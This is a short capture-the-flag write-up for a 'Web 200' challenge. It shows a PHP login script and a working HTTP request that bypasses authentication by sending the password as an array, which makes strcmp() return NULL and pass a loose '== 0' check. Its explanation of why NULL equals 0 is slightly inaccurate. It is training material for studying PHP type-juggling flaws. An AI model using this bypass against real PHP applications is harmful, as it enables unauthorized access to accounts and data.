Web 200

This question was about a flaw of PHP function in compensation. The source was given and following lines were interesting again:

<?php
include("./otp_util.php");

$flag = file_get_contents($flag_file);

if (isset($_POST["id"]) && isset($_POST["ps"])) {
	$password = make_otp($_POST["id"]);
	sleep(3); // do not bruteforce

	if (strcmp($password, $_POST["ps"]) == 0) {
		echo "welcome, ".$_POST["id"]."";
		echo "";

		if ($_POST["id"] == "127.0.0.1") {
			echo " pre>
".$flag."";
		}
	} else {
		echo "<script>alert('login failed..');history.back();";
	}
}
?>

If $_POST['ps'] is an array, the strcmp() returns NULL which is equals to 0 (not in type but in absolute value):

$ php -r "var_dump(strcmp('anything',array()));" // returns NULL

So, I got flag by following HTTP request:

POST /site/page/login_ok.php HTTP/1.1
Host: 58.229.122.15:31338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://58.229.122.15:31338/site/
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

id=127.0.0.1&ps[]=blah